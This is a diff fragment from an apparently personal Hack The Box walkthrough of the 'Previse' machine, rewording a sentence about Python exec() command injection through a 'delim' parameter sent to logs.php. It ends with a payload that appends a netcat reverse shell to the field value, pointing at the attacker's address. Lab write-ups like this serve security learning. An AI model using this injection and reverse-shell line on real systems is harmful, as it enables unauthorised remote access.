jsom1/jsom1.github.io/_walkthroughs/Previse.md

 ![post syntax]({{https://jsom1.github.io/}}/_images/htb_prev_burp3.png)
 </div>

 Line 14 shows the selected delim which is directly passed to the *logs.php* script.
-By researching more information about the python *exec()* command, I found the exact same article I read for BountyHunter, and talks about command injection in Python using *eval()* and *exec()*.
+By researching more information about the python *exec()* command, I found the exact same article I read for <a href="/_walkthroughs/BountyHunter">BountyHunter</a>, which explains command injection in Python using *eval()* and *exec()*.
 It appears it is the same idea as the previous time.
 After playing a little bit with the command, I came up with the following one to get a reverse shell:

 ````
 delim=comma; nc -nv 10.10.14.12 4444 -e /bin/bash